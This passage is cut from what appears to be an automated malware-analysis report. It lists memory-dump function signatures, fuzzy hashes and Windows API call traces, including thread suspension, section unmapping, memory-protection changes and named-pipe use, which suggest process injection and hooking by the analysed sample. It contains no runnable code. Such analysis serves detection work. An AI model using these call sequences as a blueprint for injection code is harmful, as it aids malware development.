  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
